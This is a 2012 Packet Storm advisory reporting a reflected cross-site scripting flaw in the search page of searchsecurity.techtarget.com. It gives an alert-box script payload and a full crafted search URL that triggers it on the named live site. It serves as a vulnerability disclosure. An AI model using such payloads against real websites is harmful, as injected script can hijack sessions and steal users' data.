Searchsecurity.techtarget.com Cross Site Scripting

2012-01-10T00:00:00
ID PACKETSTORM:108531
Type packetstorm
Reporter Girish Shrimali
Modified 2012-01-10T00:00:00

Description

                                        
                                            `>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
WhiteHatZone  
  
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<  
  
# Exploit Title: XSS vulnerability in searchsecurity.techtarget.com  
# Date: 10/01/2012  
# Author: Girish Shrimali  
# Website: http://whitehatzone.blogspot.com  
# Tested On: Win7  
# Email: gjshrimali@gmail.com  
# Google Dork : searchsecurity  
  
##############################################################################################################  
  
>>> Vulnerable : http://searchsecurity.techtarget.com/  
  
>>> Script : <script>alert('XSS found by Girish Shrimali');</script>  
  
>>> Vulnerable link : http://searchsecurity.techtarget.com/search/query?start=0&filter=1&q=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E  
  
##############################################################################################################  
  
Greetz : Vidit Baxi, Sumit Pareek  
`